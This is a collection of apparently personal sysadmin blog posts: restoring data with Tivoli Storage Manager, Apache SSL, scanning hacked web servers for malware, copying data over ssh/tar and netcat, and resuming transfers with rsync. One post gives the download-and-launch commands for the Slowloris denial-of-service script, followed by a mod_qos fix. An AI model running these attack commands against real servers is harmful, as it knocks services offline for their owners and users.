   186. | 24-04-2012 00:22:56        670  B  A   /home/hipo/projects/hsm42125upg/inetd.conf
   187. | 24-04-2012 00:22:56       2.71 KB  A   /home/hipo/projects/hsm42125upg/inittab
   188. | 24-04-2012 00:22:56       1.00 KB  A   /home/hipo/projects/hsm42125upg/md5check
   189. | 24-04-2012 00:22:56      79.23 KB  A   /home/hipo/projects/hsm42125upg/mkreport.020423.out
   190. | 24-04-2012 00:22:56       4.27 KB  A   /home/hipo/projects/hsm42125upg/ssamap.020423.out
   191. | 26-04-2012 01:02:08      12.78 MB  A   /home/hipo/projects/hsm42125upg/PMR70023/70023.tar
   192. | 25-04-2012 16:33:36      12.78 MB  I   /home/hipo/projects/hsm42125upg/PMR70023/70023.tar
        0———10——–20——–30——–40——–50——–60——–70——–80——–90–
<U>=Up  <D>=Down  <T>=Top  <B>=Bottom  <R#>=Right  <L#>=Left
<G#>=Goto Line #  <#>=Toggle Entry  <+>=Select All  <->=Deselect All
<#:#+>=Select A Range <#:#->=Deselect A Range  <O>=Ok  <C>=Cancel
pick> 


To navigate in the pick interface you can select individual files to restore via the number seen on the left side.
To scroll up / down use 'U' and 'D' as described in the legend.

 

11. Restoring your data to another machine

 

In certain circumstances, it may be necessary to restore some, or all, of your data onto a machine other than the original from which it was backed up.

In the ideal case the machine platform should be identical to that of the original machine. Where this is not possible or practical, please note that restores are only possible for partition types that the operating system supports. Thus a restore of an NTFS partition to a Windows 9x machine with just FAT support may succeed, but the file permissions will be lost.
TSM does not work well with cross-platform backup / restore, so better do not try cross-platform restores, e.g. trying to restore files onto a Windows machine that have previously been backed up with a non-Windows one. TSM backups created on other OS platforms and restored onto Windows can become inaccessible from the host system.

To restore your data to another machine you will need the TSM software installed on the target machine. Entries in Tivoli configuration files dsm.sys and/or dsm.opt need to be edited if the node that you are restoring from does not reside on the same server. Please see our help page section on TSM configuration files for their locations for your operating system. 

To access files from another machine you should then start the TSM client as below:

 

# dsmc -virtualnodename=RESTORE.MACHINE      


You will then be prompted for the TSM password for this machine.

 

You will probably want to restore to a different destination to the original files to prevent overwriting files on the local machine, as below:

 

  • Restore of D:\ Drive to D:\Restore ** Windows 

 

tsm> rest D:\*   D:\RESTORE\    -su=yes 
 

 

  • Restore user /home/* to /scratch on ** Mac, Unix/Linux

 

tsm> rest /home/* /scratch/     -su=yes  
 

 

  • Restoring Tivoli data on old netware

 

tsm> rest SOURCE-SERVER\USR:*  USR:restore/   -su=yes  ** Netware

 

12. Adding more directories for incremental backup / Check whether TSM backup was done correctly?

The easiest way is to check the produced dsmsched.log; if everything is okay there should be records in the log that the Tivoli backup was scheduled and completed
successfully.
A normally produced scheduled backup in the log should look something like:

 

14-03-2020 23:03:04 — SCHEDULEREC STATUS BEGIN
14-03-2020 23:03:04 Total number of objects inspected:   91,497
14-03-2020 23:03:04 Total number of objects backed up:      113
14-03-2020 23:03:04 Total number of objects updated:          0
14-03-2020 23:03:04 Total number of objects rebound:          0
14-03-2020 23:03:04 Total number of objects deleted:          0
14-03-2020 23:03:04 Total number of objects expired:         53
14-03-2020 23:03:04 Total number of objects failed:           6
14-03-2020 23:03:04 Total number of bytes transferred:    19.38 MB
14-03-2020 23:03:04 Data transfer time:                    1.54 sec
14-03-2020 23:03:04 Network data transfer rate:        12,821.52 KB/sec
14-03-2020 23:03:04 Aggregate data transfer rate:        114.39 KB/sec
14-03-2020 23:03:04 Objects compressed by:                    0%
14-03-2020 23:03:04 Elapsed processing time:           00:02:53
14-03-2020 23:03:04 — SCHEDULEREC STATUS END
14-03-2020 23:03:04 — SCHEDULEREC OBJECT END WEEKLY_23_00 14-12-2010 23:00:00
14-03-2020 23:03:04 Scheduled event 'WEEKLY_23_00' completed successfully.
14-03-2020 23:03:04 Sending results for scheduled event 'WEEKLY_23_00'.
14-03-2020 23:03:04 Results sent to server for scheduled event 'WEEKLY_23_00'.

 

In case of errors you should check dsmerror.log.
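For a quick non-interactive check of the schedule log, something like the below grep can be used (the log path varies with the client installation; /var/tsm, as seen in the earlier error message, is one common location):

# grep 'completed successfully' /var/tsm/dsmsched.log | tail -3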
 

Conclusion


In this article I've briefly evaluated some basics of IBM's commercial Tivoli Storage Manager (TSM): how to list backups, check backup schedules, and see which files are set to be
excluded from a backup location, and most importantly how to check that backed up data is in good shape and accessible.
It was explained how backups can be restored on a local and a remote machine, as well as how to append new files to the set for backup on the next incremental scheduled backup.
It was shown how the pick interactive cli interface can be used to restore files from a certain date back in time, as well as how full partitions can be restored and how a
certain file can be retrieved from the TSM data copy.

Run Apache with SSL Self Signed SSL Certificate

Friday, August 14th, 2009

Recently I had to run apache on Debian 4.0 (Etch) with a self signed certificate. To make it happen I had to Google around and try out stuff. I've read that Debian comes with a command (apache2-ssl-certificate) that generates a self signed openssl certificate. However on my Debian systems this cmd wasn't available, so I had to google around about it, and I came along the following website which provided me with the script itself and some instructions on how to use it. I've modified a bit the archive mentioned on the above website to turn the website's install instructions into a script. I've built a new archive based on the archive apache2-ssl.tar.gz that includes an extra file runme.sh which does the proper installation for you. The new archive itself could be found here.

In the mean time I recommend you read my article explaining how to quickly and efficiently generate a self-signed certificate with the openssl command on GNU / Linux and BSD.
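For quick reference, generating such a self-signed key / certificate pair boils down to a single openssl invocation of this kind (paths and lifetime are examples to adapt):

# openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt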


Tools to scan a Linux / Unix Web server for Malware and Rootkits / Lynis and ISPProtect – clean Joomla / WordPress and other CMS for malware and malicious scripts and trojan codes

Monday, March 14th, 2016

Linux-BSD-Unix-Rootkit-Malware-XSS-Injection-spammer-scripts-clean-howto-manual

If you have been hacked, or suspect that someone has broken into some of the shared web hosting servers you happen to manage, you have probably already checked the server with the rkhunter, chkrootkit and unhide tools, which give general guidance on where a server has been compromised.

However with the evolution of hacking tools out there and the boom of Web security issues, XSS / CSS / Database injections and PHP script vulnerabilities, catching an intruder, especially a spammer, has become harder and harder to achieve.

Just lately, a mail server of mine's load average increased about 10 times, and the CPU and HDD I/O load jumped over the sky.
I started evaluating the situation to find out what exactly went wrong with the machine, starting with hardware analysis tools and a physical check-up of whether all was fine with the hardware Disks / RAM etc., just to find out the machine's hardware was working perfectly.
I've also thoroughly investigated the logs of Apache, MySQL, TinyProxy and Tor server and the bind DNS and DJBDns, which were happily living there for quite some time, but didn't find anything strange.

Not in the last place, I investigated TOP processes (with the top command) and iostat, and realized the high CPU burst lay in excessive Input / Output on the Hard Drive. Checking the Qmail mail server logs and the queue with qmail-qstat was a real surprise for me, as in the queue there were about 9800 emails hanging unsent, most of which were obviously spam, so I realized someone was heavily spamming through the server. I started investigating more thoroughly, ending up in a WordPress Blog temp folder (writable by all system users) which existed under a Joomla directory infrastructure, so I guess someone got hacked through the Joomla and uploaded the malicious php spammer script to the WordPress blog. I instantly stopped it, first with chmod 000 to stop it being executed, and after examining, deleted view73.php, javascript92.php and index8239.php, which were full of PHP variables with binary encoded values; one was full of encoded strings which, after decoding, turned out to be the recipients' spammed emails.
BTW, the view*.php, javascript*.php and index*.php files were owned by www-data (the user Apache runs as), so obviously someone got hacked through some vulnerable joomla or wordpress script (the joomla there was a quite obscure version 1.5, where currently Joomla is at version branch 3.5), hence my guess is the spamming script was uploaded through a Joomla XSS vulnerability.

As I was unsure whether the scripts were not also mirrored under other subdirectories of the Joomla or WP Blog, I had to scan further to check that there were no other scripts infected with malware or trojan spammer codes, webshells, rootkits etc.
And after some investigation, I actually caught the 3 scripts being mirrored under other website folders with other numbering in the filenames: view34.php, javascript72.php, index8123.php etc.

I've used 2 tools to scan for and catch the malware / trojan scripts and make sure no common rootkit was installed on the server.

1. Lynis (to check for rootkits)
2. ISPProtect (Proprietary but superb Website malware scanner with a free trial)

1. Lynis – Universal security auditing tool and rootkit scanner

Lynis is actually from the author of the well known rkhunter, which I've used earlier to check BSD and Linux servers for rootkits.
To have an up-to-date version of Lynis, I've installed it from source:
 

cd /tmp
wget https://cisofy.com/files/lynis-2.1.1.tar.gz
tar xvfz lynis-2.1.1.tar.gz
mv lynis /usr/local/
ln -s /usr/local/lynis/lynis /usr/local/bin/lynis

 


Then, before scanning the server for rootkits, I first checked that the installed Lynis and its test definitions are up to date with:
 

lynis update info


Then to actually scan the system:
 

lynis audit system


Plenty of things will be scanned, but you will be asked multiple times whether you would like to scan different kinds of system services and log files, loadable kernel module rootkits, and common places to check for installed rootkits or server-placed backdoors. That's pretty annoying, as you will have to press Enter multiple times.

lynis-asking-to-scan-for-rootkits-backdoors-and-malware-your-linux-freebsd-netbsd-unix-server

Once scan is over you will get a System Scan Summary like in below screenshot:

lynis-scanned-server-for-rootkit-summer-results-linux-check-for-backdoors-tool

Lynis also suggests very good things that might be tweaked to make the system more secure, so using some of its output, when I have time I'll work on hardening all servers.

To prevent further incidents and keep an eye on the servers, I've deployed a Lynis scan via cron job once a month on all servers; I've placed under the root crontab, on every first day of the month, the following command:

 

 

server:~# crontab -u root -e
0 3 1 * * /usr/local/bin/lynis --quick 2>&1 | mail -s "lynis output of my server" admin-mail@my-domain.com

 

2. ISPProtect – Website malware scanner

ISPProtect is a malware scanner for web servers; I've used it to scan all installed CMS systems like WordPress, Joomla, Drupal etc.
ISPProtect is great for PHP / Python / Perl and other CMS based frameworks.
ISPProtect contains 3 scanning engines: a signature based malware scanner, a heuristic malware scanner, and a scanner to show the installation directories of outdated CMS systems.
Unfortunately it is not free software, but I personally used the FREE TRIAL option, which can be used without registration to test it or clean an infected system.
I first ran it locally on the webserver hosting the infected site.

As I wanted to also check the rest of the hosted websites, I've then run ISPProtect over the whole bunch of installed websites.
A pre-requirement of ISPProtect is to have a working PHP CLI and the ClamAV Anti-Virus installed on the server, thus on RHEL (RPM) based servers make sure you have them installed, and if not:
 

server:~# yum -y install php

server:~# yum -y install clamav


Debian based Linux web hosting server admins that don't have php-cli installed should run:
 

server:~# apt-get install php5-cli

server:~# apt-get install clamav


Installing ISPProtect from source is with:

mkdir -p /usr/local/ispprotect
chown -R root:root /usr/local/ispprotect
chmod -R 750 /usr/local/ispprotect
cd /usr/local/ispprotect
wget http://www.ispprotect.com/download/ispp_scan.tar.gz
tar xzf ispp_scan.tar.gz
rm -f ispp_scan.tar.gz
ln -s /usr/local/ispprotect/ispp_scan /usr/local/bin/ispp_scan

 

To initiate a scan with ISPProtect just invoke it:
 

server:~# /usr/local/bin/ispp_scan

 

ispprotect-scan-websites-for-malware-and-infected-with-backdoors-or-spamming-software-source-code-files

I've used it as a trial

Please enter scan key:  trial
Please enter path to scan: /var/www

You will be shown the scan progress; be patient, because on multiple shared hosting servers with a few hundred websites
the tool will take really, really long, so you might need to leave it for 1 hr or even more, depending on how many source / CSS / Javascript etc. files need to be scanned.

Once the scan is completed, the scan and infection logs will be stored under /usr/local/ispprotect, in separate files for the different website engines and CMSes:
 

Malware => /usr/local/ispprotect/found_malware_20161401174626.txt
Wordpress => /usr/local/ispprotect/software_wordpress_20161401174626.txt
Joomla => /usr/local/ispprotect/software_joomla_20161401174626.txt
Drupal => /usr/local/ispprotect/software_drupal_20161401174626.txt
Mediawiki => /usr/local/ispprotect/software_mediawiki_20161401174626.txt
Contao => /usr/local/ispprotect/software_contao_20161401174626.txt
Magentocommerce => /usr/local/ispprotect/software_magentocommerce_20161401174626.txt
Woltlab Burning Board => /usr/local/ispprotect/software_woltlab_burning_board_20161401174626.txt
Cms Made Simple => /usr/local/ispprotect/software_cms_made_simple_20161401174626.txt
Phpmyadmin => /usr/local/ispprotect/software_phpmyadmin_20161401174626.txt
Typo3 => /usr/local/ispprotect/software_typo3_20161401174626.txt
Roundcube => /usr/local/ispprotect/software_roundcube_20161401174626.txt


ISPProtect gives really good results and is definitely the best malicious script / trojan / webshell / backdoor / spammer (hacking) scripts detection tool available, so if your company can afford it, you'd better buy a license and set up a periodic cron job scan of all your servers, like let's say:

 

server:~# crontab -u root -e
0 3  1 * *   /usr/local/ispprotect/ispp_scan --update && /usr/local/ispprotect/ispp_scan --path=/var/www --email-results=admin-email@your-domain.com --non-interactive --scan-key=AAA-BBB-CCC-DDD


Unfortunately ispprotect is quite expensive, so I guess most small and middle sized shared hosting companies will be unable to afford it.
But even for a one time run this tool is worth the try and will save you hours if not days of system investigations.
I'll be glad to hear from readers if they are aware of any free software alternatives to ISPProtect. The only one I am aware of is Linux Malware Detect (LMD).
I've used LMD in the past, but as of the time of writing this article it doesn't seem to work any more, so I guess the tool is currently unsupported / obsolete.

 

Apache Denial of Service (DoS) attack with Slowloris / Crashing Apache

Monday, February 1st, 2010

slowloris-denial-of-service-apache-logo
A friend of mine pointed me to a nice tool that is able to create a successful denial of service on
most of the running web servers out there. The tool is called slowloris.
For any further information there is the following publication on ha.ckers.org about slowloris.
The original article of my friend is located on his (mpetrov.net) personal blog.
Unfortunately the post is in Bulgarian, so it's not a match for the English speaking audience.
To launch the attack on Debian Linux all you need is:

# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
now issue the attack
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

There you go, the Apache server is not responding, and no traces of the DoS are left on the server;
the log file is completely clear of records!
The fix to the attack comes with installing the not so popular Apache module: mod_qos
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.c
The module installs to "/usr/lib/apache2/modules". All that's left is configuring the module:
# cd /etc/apache2/mods-available/
# vim qos.load

Add the following in the file:

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
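Loading the module alone only gives you defaults; to actually push back slow-request clients, a couple of tuning directives are needed. A minimal sketch (directive names as per the mod_qos documentation; the values are examples you must tune for your site) that could go into a qos.conf in the same directory:

# minimum data rate (bytes/sec) a client must keep, scaled from 120 up to 1200 as the server gets busier
QS_SrvMinDataRate 120 1200
# maximum concurrent connections allowed per source IP
QS_SrvMaxConnPerIP 30

Then enable it the Debian way and restart Apache:

# a2enmod qos
# /etc/init.d/apache2 restart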

Cheers! 🙂
I should express my gratitude to Martin Petrov's blog for the great info.

How to Copy large data directories between 2 Linux / Unix servers without direct ssh / ftp access between server1 and server2, by using SSH, TAR and Unix pipes

Monday, April 27th, 2015

how-to-copy-large-data-directories-between-2-linux-unix-servers-without-direct-ssh-ftp-access-btween-each-other

In a Web application data migration project, I've come across a situation where I have to copy / transfer 500 Gigabytes of data from Linux server 1 (host A) to Linux server 2 (host B). However the two machines don't have direct access to each other (via port 22) for security reasons, and hence I cannot use sshfs to mount the remote host dir via ssh and copy files like local ones.

As this is a data migration project it is however necessary to migrate the data by finding a way … The normal way companies do it is to copy the data to an External Hard disk storage and send it via some country's post services, or an employee is sent to the Data center to attach the SAN to the new server where data is being migrated. However in my case this was not possible, so I had to do it differently.

I have access to both servers as they're situated in the same Corporate DMZ network and I can thus access both UNIX machines via SSH.

Thankfully there is a small SSH protocol + TAR archiver and default UNIX pipe capabilities hack that makes it possible to easily transfer multiple (large) files and directories. The only requirement to use this nice trick is to have the SSH client installed on the middle host, from which you can access via SSH protocol Server1 (from where data is migrated) and Server2 (where data will be migrated).

If the hopping / jump server from which you're allowed to access Linux servers Server1 and Server2 is not Linux, you're missing the SSH client, and you don't have access on the Win host to install anything on it, just use portable mobaxterm (as it has a Cygwin SSH client embedded).

Here is how:
 

jump-host:~$ ssh server1 "tar czf - /somedir/" | pv | ssh server2 "cd /; tar xzf -"


As you can see from the above command line example, an SSH connection is made to server1, tar is used to archive the directory / directories containing my hundreds of gigabytes, and this is then passed to another opened ssh session to server2 via the UNIX pipe mechanism, where the TAR archiver is used a second time to unarchive the previously passed archived content. The pv command in the middle is not obligatory, though it is a nice way to monitor the status of the data transfer, like below:
 

500GB 0:00:01 [10,5MB/s] [===================================================>] 27%


P.S. If you don't have PV installed install it either with apt-get on Debian:

 

debian:~# apt-get install --yes pv

 

Or on CentOS / Fedora / RHEL etc.

 

[root@centos ~]# yum -y install pv

 

Below is a small chunk of PV manual to give you better idea of what it does:

NAME
       pv – monitor the progress of data through a pipe

SYNOPSIS
       pv [OPTION] [FILE]…
       pv [-h|-V]

DESCRIPTION
       pv  allows  a  user to see the progress of data through a pipeline, by giving information such as time elapsed, percentage
       completed (with progress bar), current throughput rate, total data transferred, and ETA.

       To use it, insert it in a pipeline between two processes, with the appropriate options.  Its standard input will be passed
       through to its standard output and progress will be shown on standard error.

       pv  will  copy  each  supplied FILE in turn to standard output (- means standard input), or if no FILEs are specified just
       standard input is copied. This is the same behaviour as cat(1).

       A simple example to watch how quickly a file is transferred using nc(1):

              pv file | nc -w 1 somewhere.com 3000

       A similar example, transferring a file from another process and passing the expected size to pv:

              cat file | pv -s 12345 | nc -w 1 somewhere.com 3000


Note that with very big file transfers, using PV will slow the data transfer a bit, because everything has to pass through another 2 pipes; however for file transfers up to a few gigabytes it's really nice to include it.

If you only need to transfer a huge .tar.gz archive and you don't bother about traffic security (i.e. don't care whether the transferred traffic goes through an encrypted SSH tunnel, don't want to put the overhead of encrypting the data on both systems, and have some unfiltered ports between host 1 and host 2), you can run netcat on host 2 to listen for connections and forward the .tar.gz content via netcat's port like so:
 

linux2:~$ nc -l -p 12345 > /path/destinationfile
linux1:~$ cat /path/sourcefile | nc desti.nation.ip.address 12345
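The same netcat trick can move a whole directory in one shot if you pair it with tar on both ends (a sketch; port, host placeholder and paths are examples):

linux2:~$ nc -l -p 12345 | tar xzf - -C /destination/dir
linux1:~$ tar czf - /directory/to/copy | nc desti.nation.ip.address 12345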


Another way to transfer large data without a direct connection between server1 and server2, but with a connection to a third host PC, is to use rsync and good old SSH tunneling, like so:
 

jump-host:~$ ssh -R 2200:Linux-server1:22 root@Linux-server2 "rsync -e 'ssh -p 2200' --stats --progress -vaz /directory/to/copy root@localhost:/copy/destination/dir"

Resume sftp / scp cancelled (interrupted) network transfer – Continue (large) partially downloaded files on Linux / Windows

Thursday, April 23rd, 2015

resume-sftp-scp-cancelled-interrupted-file-transfer-download-upload-network-transfer-continue-large-partially-downloaded-file-howto-linux-windows
I've recently had a task to transfer some huge Application server data stored for a long time (about 70GB), after being archived, between an old Linux host server and a new one, where the new Tomcat Application (Linux) server will be installed to handle the increased sites' accessibility (server hardware overload).

The two systems are in a paranoid DMZ network and do not have access to each other via SSH / FTP / FTPS, and there is not even Web access on port 80 or SSL port 443 between the two hosts, so in order to move the data I had to use a third HOP station, a Windows (server) which has a huge SAN network attached storage of 150 TB (as a mapped drive I:/).

On the Windows HOP station, which gives me access via Citrix Receiver to the DMZ-ed network, I'm using mobaxterm, so I have the basic UNIX commands such as sftp / scp already existing on the Windows system via it.
Thus to transfer the Chronos Tomcat application stored files, .tar.gz archived, I've sftp-ed into the Linux host and used the get command to retrieve the archive, e.g.:

 

sftp UserName@Linux-server.net
Password:
Connected to Linux-server.
sftp> get Chronos_Application_23_04_2015.tar.gz

….


The secured DMZ network seemed to have a network shaper limiting my get / secured SCP download to 2.5MBytes / sec, so the overall file transfer seemed to require a lot of time, about 08:30 hours to complete. As it was the middle of the day, about 13:00, and my work day ends at 18:00 (meaning I would be able to keep the file retrieval session going for a maximum of 5 hrs), the file transfer would cancel when I logged out of the HOP station (after 18:00).

However I had already left the file transfer running for 2 hrs, and thus about 23% of the file was retrieved, so I wondered whether SCP / SFTP protocol file downloads could be resumed. I checked thoroughly all the options within sftp (the interactive SCP client) and the scp command manual itself, but none of them has a resume option. Then I thought for a while about what I could use to continue the interrupted download, and I remembered good old rsync (the versatile remote and local file copying tool), which I often use when creating customer backup strategies, and which has the ability to resume partially downloaded files.

I wondered whether this partially downloaded file resume could be done only if the file transfer had been initiated through rsync itself, but luckily rsync is able to continue interrupted file transfers no matter what kind of HTTP / HTTPS / SCP / FTP program was used to start the file retrieval (rsync can continue transfers cancelled / failed due to network problems or user activity). That turned out to be pretty easy; to continue the failed file download from where it was interrupted I had to change to the directory where the file is located:
 

cd /path/to/interrupted_file/


and issue command:
 

rsync -av --partial username@Linux-server.net:/path/to/file .


the --partial option is the one that does the file resume trick, the -a option stands for --archive and turns on archive mode (equals -rlptgoD (no -H,-A,-X)), and the -v option shows a file transfer percentage status line and an average estimated time for the transfer to complete. An easier to remember rsync resume is like so:
 

rsync -avP username@Linux-server.net:/path/to/file .
Password:
receiving incremental file list
chronos_application_23_04_2015.tar.gz
  4364009472   8%    2.41MB/s    5:37:34

To continue a failed file upload with rsync (e.g. if you used the sftp put command and the upload transfer failed or was cancelled):
 

rsync -avP chronos_application_23_04_2015.tar.gz username@Linux-server.net:/path/where_to/upload


Of course, for the rsync resume to work the remote Linux system must have the rsync package installed; if rsync is not available on the remote system this will not work, so before using this method make sure the remote Linux / Windows server has rsync installed. There is also an rsync port for Windows, so to resume large Giga or Terabyte file archive downloads easily between two Windows hosts use cwRsync.